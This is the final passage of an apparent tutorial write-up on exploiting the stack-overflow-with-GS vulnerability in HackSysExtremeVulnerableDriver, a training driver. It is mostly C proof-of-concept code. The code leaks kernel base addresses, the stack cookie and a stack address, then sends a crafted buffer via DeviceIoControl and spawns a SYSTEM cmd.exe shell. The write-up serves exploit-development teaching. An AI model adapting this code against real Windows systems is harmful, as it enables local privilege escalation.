  printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD);
  printf("[*] Base address of NT @{0x%p}\n", lpvNtKrnl);

  printf("[*] Attempting to leak __security_cookie\n");
  cookie = LeakCookie(hHEVD, lpvHEVD);
  if (cookie == 0x00)
  {
    printf("[-] Failed to leak stack cookie\n");
  }

  /* I found I need to hammer the stack leak to get it to work :| */
  while (1) {
    LeakStack(L"poc.exe", &lpvStackLeak);
    if (lpvStackLeak != NULL) {
      break;
    }
  }

  if (lpvStackLeak == NULL)
  {
    printf("[-] Failed to leak stack address\n");
    return -1;
  }

  lpvMemoryAlloc = VirtualAlloc(NULL,
                                ALLOCATION_SIZE,
                                (MEM_COMMIT | MEM_RESERVE),
                                PAGE_EXECUTE_READWRITE);
  if (lpvMemoryAlloc == NULL)
  {
    printf("[*] Failed to create exploitation buffer\n");
    return -1;
  }

  dwExploitBuffer = GenerateExploitBuffer(lpvNtKrnl, lpvStackLeak, cookie, lpvMemoryAlloc);
  printf("[*] Sending payload!!!\n", dwExploitBuffer);

  DeviceIoControl(hHEVD,
                  STACK_OVERFLOW_GS_IOCTL,
                  lpvMemoryAlloc,
                  dwExploitBuffer,
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);

  return CheckWin();
}

int main()
{
  HANDLE hHEVD = NULL;
  
  hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                      (GENERIC_READ | GENERIC_WRITE),
                      0x00,
                      NULL,
                      OPEN_EXISTING,
                      FILE_ATTRIBUTE_NORMAL,
                      NULL);

  if (hHEVD == NULL)
  {
    printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
    return -1;
  }

  if (Exploit(hHEVD) == 0) {
    printf("[*] Exploitation success!!! Enjoy de shell!!\n\n");
    system("cmd.exe");
  } else {
    printf("[-] Exploitation failed, run again\n");
  }

  if (hHEVD != INVALID_HANDLE_VALUE) {
    CloseHandle(hHEVD);
  }
}

Once sent we, we get our privileged shell!

Sources
#

https://kristal-g.github.io/2021/02/07/HEVD_StackOverflowGS_Windows_10_RS5_x64.html
https://github.com/sam-b/windows_kernel_address_leaks/tree/3810bec445c0afaa4e23338241ba0359aea398d1

Table of Contents #

What are Stack Cookies (High Level) #

Reverse Engineering #

Crafting a PoC #

Mitigation Analysis #

Baking Cookies #

Exploitation #

Sources #